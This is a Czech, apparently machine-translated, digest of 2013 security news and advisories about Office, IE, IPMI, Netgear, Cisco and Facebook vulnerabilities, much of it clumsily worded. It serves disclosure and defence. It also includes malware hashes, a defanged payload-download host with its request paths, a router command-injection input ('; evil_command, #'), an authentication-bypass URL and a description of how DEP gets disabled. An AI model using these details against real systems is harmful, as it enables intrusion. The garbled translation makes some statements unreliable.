Dva obdobné programy pro své produkty v červnu tohoto roku spustil také Microsoft, platí však za to, že mu experti zašlou nové obranné techniky či metody zneužití kódu, jež umí obejít současnou ochranu. V pondělí společnost jeden z těchto programů rozšířila tak, že vyplácí peníze i nové útočné techniky. Microsoft do června také provozoval klasický program odměn, v rámci kterého platil za chyby objevené v Internet Exploreru 11. Finanční odměny za nalezení chyb zavedla také společnost Yahoo.


Vyřešení záhady Office zero-day využívat a DEP
8.11.2013 Zranitelnosti

Dne 5. listopadu McAfee Labs blozích Microsoft Office zero-day útoku, který jsme spatřili ve volné přírodě. V dalším příspěvku jsme se zabývali pokrytí našich různých produktů. Nyní bychom chtěli oznámit některé zajímavé technické poznatky z našeho výzkumného týmu.
Jak bylo uvedeno v našem předchozím příspěvku , jsme zjistili, že exploit funguje docela dobře na Office 2007 s operačním systémem Windows 7. Původně jsme si myslel, že musí být nějaká technika používaná ke zneužití obejít rozvržení adresního prostoru randomizace a Zabránění spuštění dat. Nicméně, naše výsledky ukazují něco jiného, ​​protože DEP nastavení systémových zásad.
Při ladění shell kódu, všimli jsme si docela dost zajímavých věcí. Za prvé, shell kód byl v PAGE_READWRITE bloku paměti, který nás povzbudil k dalšímu zkontrolovat DEP stav procesu Winword.exe. Našli jsme DEP stav byl "on" na zahájení procesu, ale na "OFF" při spuštění shell kódu.
McAfee Labs výzkumník Haifei Li bylo toto exploit pracoval na úrovni systému DEP možností, včetně obou Opt-In a opt-out pro sadu Office 2007. Je-li systém je nastavena zásada opt-in, je DEP povolena pouze pro procesy, které výslovně opt-in závisl. Office 2007 Word není ve DEP povoleno seznamu, a tak DEP není povolena pro Office 2007 v rámci režimu opt-in a není potřeba exploitu obejít DEP uspět. Testovali jsme dále na opt-out režimu. Je-li systém politika je nastavena na opt-out, je DEP ve výchozím nastavení povoleno pro všechny procesy, kromě těch, které výslovně odhlásit DEP. To znamená, že obvykle je na DEP pro všechny procesy pro tuto možnost, když se začnou, ale proces má možnost odhlásit se z DEP v každém okamžiku. Zjistili jsme, že pokud budeme zablokoval načítání VBE6.dll (C: \ Program Files \ Common Files \ Microsoft Shared \ VBA \ VBA6 \ VBE6.dll), by exploit nefunguje-DEP-k chybě narušení byl spuštěn. Také, pokud jsme nuceni Zabránění spuštění dat s Microsoft Emet by exploit nefunguje.
Výsledky testů nám způsobili otázku, zda došlo k DEP bypass, například pomocí ROP gadgets. Ačkoli mnoho jiní výzkumníci tvrdí tento bod po jejich analýze, oni by mohli analyzovat různé vzorky. (MD5 hash našeho zkoumaného vzorku 1FD4F3F063D641F84C5776C2C15E4621.)
Rychle jsme injekčně naše DLL v winword.exe se zahnutým LoadLibraryExA a zavolal GetProcessDEPPolicy před a po zatížení každého modulu. Otevřeli jsme protokol a zjistil, že DEP stav změní na "off" hned po načtení VBE6.dll. Po nějaké vyšetřování jsme zjistil jsem, že ntdll! ZwSetInformationProcess může být volána s parametry -1 a 0 × 22 vypnout DEP pro proces. Takže těsně před voláním LoadLibrary s VBE6.dll stanovíme bod zlomu v ntdll! ZwSetInformationProcess, a to schytal s očekávanými parametry (-1,0 × 22). Back-trasování volání, jsme narazili na toto:
DEP_1
Toto je kód zakázat DEP pro proces:
DEP_2
To řeší záhadu využití. Naše analyzovány exploit neměl obejít ASLR a DEP. Místo toho zadlužuje o zpětné kompatibility Office 2007 zakázat DEP. Bez DEP, ASLR je poměrně snadné obejít se haldy stříkání, jak je uvedeno v tomto příspěvku Microsoft SRD .
Věříme, že DEP problém s kompatibilitou starých DLL jako VBE6.dll dělá toto využití možné. Microsoft vedení potvrdil naše podezření. Systém DEP politika může být nastavena na opt-in, opt-out, Always-On a vždy-Off. Pouze Always-On volba vynutí spuštění dat, což znamená, že proces nelze vypnout DEP. Z důvodů kompatibility může Always-On nastavení způsobí DEP související s pády způsobené aplikacemi sady Microsoft Office otevírání dokumentů, které obsahují Visual Basic for Applications makra.
Z toho plyne ponaučení jsme se dozvěděli, je zajímavá. Pro lepší zabezpečení by měl být systém nastavení DEP být Always-On. Ale pro kompatibilitu, můžete Opt-Out se používá k ochraně aplikací, které předpokládají DEP dispozici. Nicméně Opt-Out nastavení systému nemusí mít plnou ochranu DEP pro aplikaci, která není výslovně odhlásit DEP, a tak jako aplikace (Microsoft Word v tomto případě), je stále předmětem zneužití, které mohou být zabráněno DEP.


IE zero-day zranitelnost Využití Msvcrt.dll

9.11.2013 Zranitelnosti

FireEye Labs objevil exploit ", která využívá nový informační úniku zranitelnost IE a out-of-bounds memory access zranitelnosti k dosažení spuštění kódu." [1] Na základě jejich analýzy, se týká IE 7, 8, 9 a 10.

Podle společnosti Microsoft, lze tuto chybu zabezpečení lze zmírnit Emet. [ 2 ] [ 3 ] Další informace o FireEye Labs funkce k dispozici zde .

[1] http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html
[2] https://isc.sans .edu / forums / Deník / EMET 40 + je + + nyní k dispozici + pro + download/16019
[3] http://www.microsoft.com/en-us/download/details.aspx?id=39273


TIFF Zero Day chybí listopadu Patch Tuesday aktualizace

7.11.2013 Zranitelnosti

Patch pro Windows zero-day zveřejněny tento týden nebude včas připravena na příští týden měsíční Patch Tuesday vydání, Microsoft řekl dnes.

Chyba zabezpečení v několika systémů Windows a Office verze je využívána v cílených útoků proti systémech Windows XP sadou Office 2007. Útoky byly omezeny tak daleko na Blízkém východě av Asii. Vydala společnost Microsoft Fix-It nástroj, jako provizorní opatření do náplasti se uvolní mimo pásmo nebo v prosinci aktualizacích zabezpečení.

Microsoft mezitím vydá osm bulletinů příští týden , tři z nich kritické, včetně dalšího Internet Explorer roll-up jít celou cestu zpět do IE 6. Další dvě kritické bulletiny jsou nedostatky v systému Windows, což je první sada patchů v měsících, které nemá vliv na serveru Microsoft Component.

Pokud jde o zero-day chyby, je v rozhraní grafický design, nebo GDI +, nalezeno Office, Windows a Lync. Microsoft objasnil nějaký zmatek podmínek, v nichž byla zjištěna chyba zabezpečení. V kanceláři, například, 2003 a 2007 ovlivněna bez ohledu na základní operační systém. Office 2010 v systému Windows XP nebo Windows Server 2003 je zranitelný, Office 2013 není.

Vista a Windows Server 2008, mezitím obsahovat zranitelnou součást GDI +, ale nejsou napadeni, uvedl Microsoft. Jiné verze Windows nejsou ovlivněny, pokud používáte verzi systému Office nebo Lync, která je ovlivněna. Všechny podporované verze systému Lync podporuje postiženou součást, ale nejsou pod útokem.

Útoky jsou prováděny prostřednictvím infikovaných Word dokumentů odeslaných e-mailových příloh.

"Pokud je příloha otevření nebo náhledu, pokusí zneužít tuto chybu zabezpečení s použitím chybně grafiku (TIFF), vloženého do dokumentu. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jaká má přihlášený uživatel "Microsoft poradní říká.

Útočníci mohou získat schopnost vzdáleně injekci kódu na infikovaný stroj.

Včera se objevily nové detaily z výzkumných pracovníků na AlienVault. Jakmile útočníci mají přítomnost na stroji, malware stažení souboru RAR který se připojuje k serveru útočníka a stáhne další malware, včetně keylogger, backdoor a součásti, které se krade produktivity soubory, jako jsou tabulky, Word docs, Power Point a PDF soubory.

Výzkumníci společnosti Kaspersky Lab říkal, že toto není první exploit pro zranitelnosti TIFF a také našel další škodlivého chování.

"Nová 0den používá chybně TIFF údajů obsažených v dokumentech sady Office, aby se spustit shell kód pomocí haldy sprej a ROP techniky. Již jsme zkoumali některé shellcodes - vykonávají společné akce (pro shellcodes): Vyhledat API funkcí, stáhněte a spusťte náklad, "řekl Vjačeslav Zakorzhevsky, vedoucí skupiny zranitelnosti výzkumu v Kaspersky. "Vzali jsme si pohled na stažené nákladem -. Zadní vrátka a Trojan-špioni"

Výzkumníci FireEye mezitím dnes řekl, že další skupina používá exploit k poklesu bankovního Citadel škodlivého kódu do napadených počítačů, přináší kriminální živly do rovnice vedle cílených útoků špionáže. FireEye řekl, že skupina Arx za tyto útoky měly exploit déle než skupina ho používá v cílených útoků. FireEye řekl 619 byly cíle ohroženo, nejvíce v Indii.


Aktualizace a zmírňování s cílem CVE-2013-3906 Zero-Day ohrožení
7.11.2013 Zranitelnosti

Dne 5. listopadu, Microsoft vykázala Security Advisory 2896666 . Tato chyba zabezpečení, objevený Haifei Li McAfee Labs, ovlivní více verzí sady Microsoft Office, Windows a Lync. Úspěšné zneužití může mít za následek schopnost spustit libovolný kód na zranitelné hostitele (vzdálené spuštění kódu).
Problematika (číslo přetečení), spočívá v manipulaci s upraveného TIFF soubory. Vzdálený útočník může potenciálně zneužít tuto chybu pomocí speciálně navrženého e-mailové zprávy, distribuce škodlivého binární, nebo přes speciálně vytvořenou webovou stránku. Úspěšné zneužití této chyby zabezpečení bude mít útočník na získání stejná uživatelská práva, jako aktuálního uživatele.
Náš blog post ( McAfee Labs Detekuje zero-day exploit cílení Microsoft Office ) popisuje problém podrobněji:

McAfee Seznam výrobků / Zmírnění
McAfee VirusScan (Aktualizováno 5.listopadu)
MD5: 97bcb5031d28f55f20e6f3637270751d (Payload) - BackDoor-FBKI 920FEFDC36DA!
MD5: cb28d93d9eb3c38058a24ad3b05ec3eb (Payload) - Generic Backdoor.u
MD5: 5ba7ed3956f76df0e12b8ae7985aa171 (Payload) - Artemis 5BA7ED3956F7!
MD5: 5a95ca7da496d8bd22b779c4e6f41df9 (Payload) - Generic Backdoor.u
MD5: b44359628d7b03b68b41b14536314083 (Office Document) - Exploit-CVE2013-3906
MD5: 1FD4F3F063D641F84C5776C2C15E4621 (Office Document) - Exploit-CVE2013-3906
McAfee Network Security Platform (Aktualizováno 5.listopadu )
UDS-ShantiMalwareDetected
McAfee Vulnerability Manager (Aktualizováno 5.listopadu )
MVM / FSL Podívejte se uvolnit 11.05.2013

Obecné indikátory:
MD5 hash seznam:
b44359628d7b03b68b41b14536314083
97bcb5031d28f55f20e6f3637270751d
cb28d93d9eb3c38058a24ad3b05ec3eb
1FD4F3F063D641F84C5776C2C15E4621
5ba7ed3956f76df0e12b8ae7985aa171
5a95ca7da496d8bd22b779c4e6f41df9
4f73248a2641a5bc1a14bda3ef11f454 (Embedded)
6cad22128a105c455bd4a5152272239d (Embedded)
7523a56ea1526fa027735e09bffff00e (Embedded)
abc311f99a72002457f28fe26bd2e59d (Embedded)
c035acd1c10d8b17773d23be4059754f (Embedded)
e6fa16d2e808103ab9bec5676146520b (Embedded)
Síť:
hxxp: [.] / / myflatnet com
31 [.] 210 [.] 96. [.] 213
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / ralph_3 / winword.exe
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / new_red / winword.exe
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / bruce_3 / winword.exe
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / modrá / winword.exe


Microsoft varuje před cílených útoků na Windows 0-Day
6.11.2013 Hacking | Počítačový útok | Zranitelnosti

Microsoft varuje uživatele o cílených útoků proti nové zranitelnosti v několika verzích Windows a Office, která by mohla útočníkovi umožnit převzít v počítači uživatele. Chyba, která ještě není oprava, je používán jako součást cílených útoků škodlivých e-mailových příloh, zejména na Středním východě av Asii.

V nepřítomnosti záplatou, Microsoft vydala fixit nástroj pro zranitelnosti, což zabraňuje zneužití proti zranitelnosti pracovat. Chyba ovlivňuje Windows Vista, Windows Server 2008 a Microsoft Office 2003 přes 2010.

"Exploit vyžaduje zásah uživatele, jako je útok se tváří jako e-mail žádající potenciálních cílů k otevření speciálně vytvořeného Word přílohu. Pokud je příloha otevření nebo náhledu, pokusí zneužít tuto chybu zabezpečení pomocí chybně grafiku vložené do dokumentu. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jaká má přihlášený uživatel "Microsoft poradní říká.

Tato chyba zabezpečení nemá vliv na aktuální verze systému Windows, uvedla firma, a uživatelé, kteří používají potenciálně ohrožené produkty, může trvat několik opatření, aby se ochránili. Instalace fixit nástroj pomůže zabránit vykořisťování, jak bude nasazení Enhanced Mitigation Experience Toolkit (EMET), který pomáhá zmírnit využije proti některým tříd chyb.

"Tato chyba zabezpečení je vzdálené spuštění kódu, který existuje ve způsobu, jakým postižené součásti zvládnout speciálně vytvořené obrazy TIFF. Útočník by mohl zneužít tuto chybu zabezpečení tím, že by uživatele přesvědčil k náhledu nebo otevření speciálně vytvořenou e-mailovou zprávu, otevřete speciálně vytvořený soubor, nebo procházet speciálně vytvořený webový obsah. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jako aktuálního uživatele. Uživatelé, jejichž účty jsou konfigurovány tak, aby měli méně uživatelských práv v systému, by byli vystaveni menšímu riziku než uživatelé s uživatelskými právy správce <'Microsoft úředníků řekl.


Sedm IPMI Firmware lhůt Odhalené
6.11.2013 Zranitelnosti

Metasploit tvůrce HD Moore dnes zveřejněny sedm zero-day zranitelnosti v IPMI firmware od dodavatele Super Micro . Bezpečnostní otázky byly u prodejce v srpnu, ale prodejce, za potvrzující přijetí zranitelnosti nikdy sděleny s Metasploit o opravu.

Super Micro zástupce řekl Threatpost, že to byl "starý příběh" a že problém byl vyřešen. Žádost o další připomínky od Super Micro projektový manažer nebyl vrácen včas pro vydání a dostupnost záplat nemohly být potvrzeny.

"Dodavatel byl celkem klid na to, že potvrdil přijetí zranitelnosti, ale je to dlouhé a krátké na to. Řekli pro nás nic o záplatou, "řekl senior manažer Metasploit inženýrských Tod Beardsley. "Dovedu si představit, že budu záplatování tiše, ale upřímně, pokud to vydávat záplaty a dělat hodně hluku o tom, nikdo aktualizace takové věci. Je to vestavěný hardware, který sedí na více tradiční hardware, ale jako něco vloženého, ​​nikdo se patche pro tyto případy. Pracoval jsem v IT let, a myslím, že jsem aktualizoval BIOS jednou. "

IPMI, nebo inteligentní platformu rozhraní pro správu, jsou malé počítače, které sedí na základní desce, které jsou používány správci IT ve velkých datových centrech pro vzdálenou správu serverů nebo na dálkovém BIOS údržbu. Jsou většinou přítomny v rack-mount servery, a jsou těžkopádné aktualizovat, protože často vyžadují fyzický přístup k hardwaru, v prostředí poskytovatele služeb, například, tam mohl být stovky těchto embedded zařízení přítomných.

Beardsley řekl, že projekt Sonar skenování firmware IPMI v otázce, verze SMT_X9_226, našel 35.000 z nich online. Se odhaduje, že počet pravděpodobně představuje méně než 10 procent z celkového počtu zařízení v provozu.

I když se jedná již nehlášeného zranitelná-Metasploit exploitu moduly jsou v pracích, řekl Moore, jejich využívání vyžaduje trochu pochopení na straně útočníka.

"Určitě musíte vědět, co děláte, je to jiná architektura," řekl Beardsley. "Většina Exploit vývojáři a zranitelnost výzkumníci jsou obeznámeni s procesory Intel x86 nebo Intel 64-bit nebo ARM, protože Android běží na ARM, tak je to populární. Ale tyto věci běží na docela neobvyklém hardwaru pro INFOSEC kluky. Jak spolehlivé zneužitelnosti je obtížné. Nečekám, že se jedná o červa v příštích šesti hodin, nebo tak něco. Byli jsme sedí na nich na chvíli a snažil se získat spolehlivé využije. Můžeme dojít k selhání po celý den, ale to je k ničemu. Jak spolehlivé využije je složité. Byli jsme tam a zpět mezi emulované prostředí a reálných prostředích a věci, které se zdají fungovat skvěle v emulované prostředí jen spadnout na fyzickém zařízení. Bude to trvat nějakou snahu o jistý. "

Nicméně, pokud je útočník schopen využít jeden z chyb IPMI zveřejněné, by nejen na síti, ale může převzít kontrolu daném serveru na úrovni systému BIOS.

Ze sedmi popsaných chyb, nejvážnější zahrnovat statické soukromé šifrovací klíče napevno do firmwaru, jak pro lighttpd serveru webového rozhraní SSL a SSH démona Dropbear, řekl Moore.

"Útočník s přístupem k veřejně dostupné firmware Supermicro mohou provádět man-in-the-middle a offline dešifrování sdělení firmware," řekl Moore v blogpost.

Beardsley řekl, že i když je možné, že admin aktualizovat SSL klíč pro webové rozhraní, se nezdá možné aktualizovat SSH klíč.

"Takže až budete vědět, soukromý klíč, který můžete snadno extrahovat z firmwaru, je to konec hry a mohu SSH na některou z těchto zařízení," řekl.

Metasploit také uvedl, že firmware obsahuje dva napevno sady pověření pro rozhraní OpenWSMan, jeden pro soubor ověřování algoritmem Digest, který nemůže být změněn uživatelem a chová se v podstatě jako zadní vrátka, zatímco druhá zahrnuje základní ověřování hesla soubor uložený na na firmware . Moore řekl, že změna administrátorského hesla účtu stále zůstává OpenWSMan heslo stále nastavena na serveru.

Moore také zveřejněny dvě chyby zabezpečení přetečení vyrovnávací paměti v každém z login.cgi, close_window.cgi a logout.cgi CGI aplikace, stejně jako adresář traversal zranitelnost v url_redirect.cgi aplikace CGI a četné nespoutaný strcpy (), () a memcpy sprint () volá více než 65 dalších CGI aplikace dostupné přes webové rozhraní.

"Tyto věci jsou skutečné počítače a mají cenné souborové systémy," řekl Beardsley. "Můžete se omezovat jen na toto zařízení, která žije na základní desce, nebo v mnoha případech můžete použít ke správě serveru. To je to, co oni jsou tam, pro správu serveru. Je to docela malý krůček od získání do do IPMI k získání na serveru správné. "


Skenování Zobrazuje 65% Boxy ReadyNAS na webu ohrožená kritickou chybu
6.11.2013 Zranitelnosti | Bezpečnost

To bylo známé na nějakou dobu nyní, několik měsíců, ve skutečnosti, že je zásadní, vzdáleně zneužít zranitelnost v některých ReadyNAS společnosti NETGEAR pro ukládání boxů a oprava je k dispozici od července. Nicméně, mnoho z polí vystavených na webu jsou stále zranitelné, a nedávná kontrola v HD Moore Rapid7 zjistili, že asi 65 procent z ReadyNAS zařízení dosažitelné na portu 80, je stále unpatched.

Moore, zakladatel Metasploit projektu a ředitel výzkumu v Rapid7, měl zájem přijít na to, kolik ReadyNAS krabice byly vystaveny na webu, a pak, jak mnozí z těch, běhali zranitelné firmware. K tomu, že on používal jeho projektu Sonar infrastrukturu pro skenování adresního prostoru IPv4 a identifikovat ReadyNAS zařízení. To otisk bylo provedeno zasláním požadavku GET na portu 80 a ReadyNAS zařízení poslán zpět identifikovatelný záhlaví.

"Napsal jsem rychlý skript pro zpracování těchto dat přes stdin, zápas ReadyNAS zařízení a vytisknout IP adresu a Last-Modified datum z hlavičky odpovědi. Běžel jsem syrové skenování výstupu pomocí tohoto skriptu a udělal kafe. Výsledek z našeho 4.října testu se skládal z 3488 řádků výsledků. To je trochu jiný než čísel uvedených v Shodan, ale lze vysvětlit tím, DHCP, více sloučených vyšetření, a skutečnost, že webové rozhraní ReadyNAS se většinou běžně přístupná přes SSL na portu 443, "Moore napsal v blogu na experiment.

"Zajímavá část o Last-Modified záhlaví je, že to vypadá, že korelují s konkrétními verzemi firmwaru. Verze 4.2.24 byla postavena na 02.07.2013 a můžeme předpokládat, že všechny verze před které jsou unpatched. "

Moore přišel s boxy ReadyNAS 3488 vystavena na portu 80, a ty, 2257 z nich běží zranitelné verze firmware. Řekl, že není jasné, zda se výsledky budou výrazně odlišné, pokud kontrola byla provedena na portu 443.

Chyba zabezpečení v zařízení ReadyNAS, která byla objevena výzkumníkem Tripwire Craig Young, umožňuje útočníkovi spustit příkazy na zranitelné zařízení v rámci webového serveru. Mladá má proof-of-concept exploit, který mu dává reverzní shell.


Některé routery Netgear Otevřené pro vzdálenou autentizaci Bypass, Command Injection
6.11.2013 Zranitelnosti | Hrozby

Tam je chyba v některých Netgear bezdrátové směrovače, který umožňuje vzdálenému útočníkovi dovolit ohrozit kompletně zařízení a získat oprávnění uživatele root. Chyba je triviálně využitelné a badatel, který objevil zveřejnil proof-of-concept exploit.

Tato chyba zabezpečení je nástroj příkazového injekce vada, která v kombinaci se samostatným ověřování bypass chyba, že stejný výzkumník zjistil, můžete dát útočník jednoduchý root přístup zranitelných routerů. Chyba je v routeru Netgear WNDR3700v4 , domácí dvoupásmový gigabitový router a Zach Cutlip, badatel, který objevil chybu, že jeho zneužití může zneužít chybu, zakažte ověřování, otevřete Telnet server a potom obnovit router do původní stav, takže uživatel si neuvědomuje, co se stalo.

Tato chyba zabezpečení zahrnuje funkci nazvanou cmd_ping6 (), který je určen na ping nějaký daný název hostitele adresy IPv6. Nicméně chyba ve firmware umožňuje útočníkovi použít tuto funkci jako vektor ke kompromisu cílového směrovače a pak dělat, co se mu zachce. Chyba ovlivňuje verze 1.0.1.32 a 1.0.1.42 z routeru firmware.

"Co se tady děje, jak to tak často dělá, je hostitel řetězec dostane zkopírován do shellu příkazem na zásobníku pomocí sprintf (). To je pravděpodobně nejpřímější buffer overflow chyba, budete někdy vidět. Bohužel, neměli byste ji využít. Je to lákavé, kdo využívají, protože je tak čistý a jednoduchý, a proto objevovat kořen s nákladem MIPS ROP je sexy. Ale to by bylo hloupé, protože hned po ní je volání system (). Systém (systémy) Funkce propustí, co řetězec je dána k vyvolání / bin / sh. Jedná se o příkaz injekce zranitelnost ve své nejčistší podobě a je triviálně zneužít. Pokud je adresa řetězec, který je předán v něco jako "; evil_command, #", bude ping6 příkaz předčasně ukončit a evil_command bude provedena ihned po tom, "Cutlip, vedoucí výzkumný pracovník na zranitelnost Tactical Network Solutions, napsal ve svém vysvětlení Netgear vady .

Dříve Cutlip objevil a publikoval vysvětlení jiné zranitelnosti ve stejném routeru, který umožňuje útočníkovi obejít ověření funkce na routeru. Použití této chybě ve spojení s příkazového vstřikování zranitelnosti dává útočník silný způsob vlastnictví a zůstat rezidentní na Netgear routery.

"Pokud přejdete na http:// <router address> / BRS_02_genieHelp.html, budete moci obejít autentizaci pro všechny stránky v celé rozhraní pro správu. Ale nejen to, ověřování zůstává zakázána i po restartu. A samozřejmě, pokud vzdálená správa je zapnuta tato díla z Internetu frickin ', "řekl Cutlip vysvětlení chyby ověřování bypassu.

Exploit že Cutlip psal pro příkaz vstřikování zranitelnosti využívá autentizační problém stejně a dělá to docela jednoduché pro útočníka jít po zranitelné zařízení. Řekl, že když tam není žádná oprava k dispozici právě teď, nejlepší zmírnění postižených uživatelů je zakázat vzdálenou správu svých směrovačů.

"Vzdálená správa je hlavním útoku se podíváme a najít chyby v pro routery SOHO. Také se ujistěte, že je povoleno šifrování WPA2, a že nedůvěryhodné zařízení se nesmí připojit k síti, a to buď prostřednictvím kabelové nebo bezdrátové, "řekl Cutlip e-mailem.

Cutlip zmínil na Twitteru, že chyby, které našel byly také objeveny nezávisle jiný výzkumník Craig Young z Tripwire, který také našel vážnou chybu v zařízení ReadyNAS společnosti NETGEAR produktu.


Cisco Opravuje prázdný Heslo správce Chyba v TelePresence produktu

6.11.2013 Zranitelnost | Zabezpečení

Cisco oprava řadu chyb v několika samostatných produktů, včetně vážného remote chyby spuštění kódu ve své široké oblasti služeb Aplikace Mobilní software, který by mohl útočníkovi umožnit převzít úplnou kontrolu nad zranitelnou zařízení.

Cisco má také oprava zranitelnost ve svém TelePresence VX klinické konference asistent video systému pro prostředí zdravotní péče. Oprava zavře díru, která umožnila útočníkovi přihlášení k účtu správce pomocí prázdné heslo.

"Zranitelnost ve Wil-modul Cisco TelePresence VX klinický asistent by mohlo neověřenému vzdálenému útočníkovi dovolit přihlásit jako admin uživatele zařízení pomocí prázdné heslo, " Cisco poradní řekl.

"Tato chyba zabezpečení je způsobena chybou kódování, které resetuje heslo pro admin uživatele k prázdným heslem na každém restartu. Útočník by mohl zneužít tuto chybu zabezpečení přihlášení do administračního rozhraní jako admin uživatele s prázdným heslem. "

Mezitím WAAS Mobile zranitelnost postihuje všechny verze softwaru před 3.5.5 a společnost vydala novou verzi, která obsahuje opravu pro chybu.

"Zranitelnost je důsledkem nedostatečné ověření uživatelem dodaných dat v těle požadavku HTTP POST. Útočník by mohl zneužít tuto chybu zabezpečení tvorbě HTTP POST požadavek na nahrání obsahu, které by mělo za následek nekontrolované adresáře průchod. Exploit by mohla útočníkovi umožnit spuštění libovolného kódu WAAS Mobile serveru s právy na webovém serveru IIS, " Cisco poradní říká.

"Zranitelným patří do webového rozhraní pro správu, ale v nasazení, kde se používá více než jedna Cisco WAAS Mobile Server pak všechny servery, které jsou zranitelné, a to nejen ten, provedení Manager role a hostování webové rozhraní pro správu."

Nicméně, Cisco řekl, že chyba nemá vliv na všechny klienty spuštěné softwarové, pouze servery.

Společnost také vydala opravu zabezpečení v SIP provedení v jeho IOS software, který běží na mnoho z jeho serverů a dalších zařízení. Chyba by mohla umožnit útočníkovi způsobit denial-of-service stav na zranitelné zařízení.

"Tato chyba zabezpečení je způsobena nesprávným zpracováním speciálně vytvořených SIP zpráv. Útočník by mohl tuto chybu zabezpečení zneužít odesláním specifické platné SIP zpráv na bránu SIP. Exploit by mohla útočníkovi umožnit spuštění nevracení paměti nebo zařízení Obnovit ", poradní říká.


Výzkumník příspěvky Bug Podrobnosti o zdi Zuckerberg

6.11.2013 Zranitelnosti | Zabezpečení

Zpět v srpnu, Khalil Shreateh, palestinský bezpečnostní výzkumník seznam jeho stav úlohy jako "unemployee" objevil chybu na Facebooku, svět je největší sociální sítí, která mu dala možnost posílat obsah na jakémkoli jiném uživatele ose. On pak udělal to, co každý mladý podnikatelský bezpečnostní výzkumník udělá: šel rovnou na vrchol, vysvětlovat to, co on objevil se příspěvku na zdi Facebooku zakladatel a generální ředitel Mark Zuckerberg.

To je pravda, prozradil detaily z jeho chyby zneužije chybu, abyste mohl psát podrobnosti o ní na časové ose CEO Facebooku.

Aby bylo jasno, Shreateh tvrdí, že se pokusil několikrát sdělit své chybu do Bílého Facebooku Hat program, ale došlo k nedorozumění mezi nimi. Zřejmě Shreateh nebyla poskytuje dostatek technických informací. Facebook by později potvrdil existenci této chyby, vypněte Shreateh je Facebook účtu, a nakonec udělit mu žádnou odměnu za chyby, vysvětlovat to že on porušil podmínky služby s jeho demonstraci.

Překvapivé je, že incident byl malý více než nedorozumění. Facebook aktivovat Shreateh účet krátce poté, co jej deaktivovat.

Ve skutečnosti, Facebook mluvčí řekl Threatpost prostřednictvím e-mailu, který Shreateh od té doby hlášeno více chyb na jejich bílý klobouk programu po správné pokyny pro tyto a přijímání plateb nájemné v pořadí.

Zranitelnost zde není neuvěřitelně kritický, ale Facebook uživatelé by neměli mít možnost posílat obsah nebo dokonce zobrazit zdi někým jiným než svými přáteli, pokud uživatel přijímání obsahu odešla do jejich nastavení a výslovně povoleno, aby každý příspěvek na zdi.

Sheateh odhalil chybu přes bílé Facebooku Hat programu provedením útok na zdánlivě náhodném uživatele. Zpočátku se bezpečnostní tým na Facebooku reagoval na Sheateh řekl mu, že to, co zjistili, bylo to chyba, která Sheateh tvrdí, je důvod, proč on pak musel provést útok znovu publikovat příspěvek na časové ose Zuckerberg ukázat, že existovala zranitelnost.

To samozřejmě není to, co většina výzkumníků by za odpovědný zveřejnění, což je pravděpodobně důvod, proč Sheateh neobdrželi platbu nájemného, ​​když Facebook nakonec uznal chybu.


DOE kontrola odhalí nové slabiny a neopravených Starší nedostatky
6.11.2013 Zranitelnosti

Audit ministerstva energetiky ukázaly, že 29 nových nedostatky se objevily na agentury sítí letos kromě 10 stávající, že ministerstvo životního prostředí se nepodařilo opravit po 2012 auditu.

Audit provádí Úřad generálního inspektora a Úřadu auditů a kontrol, odhalil nedostatky v podávání zpráv o bezpečnostních, řízení přístupu, patch management integrita systému, konfigurační management, oddělení neslučitelných funkcí, a řízení bezpečnosti u 11 z 26 zařízení DOL je . Auditorská zpráva neuvádí konkrétní místa nebo identifikovat konkrétní chyby.

Bylo zjištěno 11 nedostatků řízení přístupu rozděleny mezi osm zařízení. Mezi přestupky v těchto místech včetně podprůměrné správu uživatelských přístupových oprávnění, nevhodné poskytnutí fyzického přístupu k citlivým zařízením, neschopnost realizovat multifaktoriální ověření pro vzdálený přístup a široké nasazení prodlení nebo snadno odhalitelný přihlásit v pověření na serverech nebo síťových služeb .

Na pěti místech, auditoři zjistili, že správci systémů dělali špatnou práci provádí software, aplikace a operační systémy, patche, takže oddělení strojů vystaveny desítky známých vulnerabilites. Audit zprávě se uvádí, že se jedná o druhy nedostatků, které dal útočníkům schopnost ukrást vaše osobní identifikační údaje o více než 100 tisíc osob uložených v těchto systémech letos v létě.

Šest míst sídlí stroje s nesprávně provedena, webových aplikací, z nichž některé obsažené špatně koncipované ověření a uživatelsky ověření funkce v systémech, které podporují finanční řízení a jiných citlivých funkcí.

Auditoři identifikoval pět různých nedostatků správy konfigurace na třech různých místech. IT týmy na těchto místech nerozvinula zásady organizace správy konfigurace nedostatečně uplatněny, konfigurační postupy pro kontrolu změn a nedostatečně správu aplikačních postupů řízení změn.

Na jednom místě, audit ukázal, že zaměstnanec ani role byly jasně definovány, ani pravidelně sledováni.

Poslední slabost uvedené v auditu se vztahuje na správnou bezpečnostní školení pro zaměstnance, ne všichni z nich dokončil bezpečnostní školení. Oni také nenahlásil počítačové bezpečnostní incidenty, udržuje pracoviště systémové seznam takovýchto událostí a pravidelně přezkoumává záznamy popisující tyto události.

Za těchto oddělení také nevystavila zprávy o bezpečnostních informací z více než 450 systémů, dodavatel-obsluhoval, které se ve zprávě tvrdí, jsou tytéž systémy, které obsahovaly většinu chyb uvedených v tomto a bývalý auditů.

Generální inspektor kancelář se trestního vyšetřování července 2013 útok, který odhalil PII stovek tisíců jednotlivců. Výsledky tohoto šetření budou zveřejněny v samostatné zprávě na pozdější dobu.

Zpráva vydaná následující doporučení DoE zaměstnanců: nápravě nedostatků zjištěných při provádění příslušných kontrol. Ujistěte se, že zásady a postupy jsou vyvíjeny, podle potřeby, a jsou realizovány v souladu s federálními a obchodních požadavků na dostatečně bezpečných systémů a aplikací. Ujistěte se, že účinné postupy pro monitorování výkonnosti jsou implementovány odhadnout celkový výkon pro ochranu přírodních zdrojů informačních technologií. Plně rozvinout a využít plány akcí a dílčích cílů na priority a sledovat nápravu všech bezpečnostních nedostatků počítačové vyžadují nápravná opatření. A zajistit, aby oddělení obsahuje informace pro oba federální a dodavatel systémů při hlášení stavu metriky plnění každoročně ministerstvo vnitřní bezpečnosti.

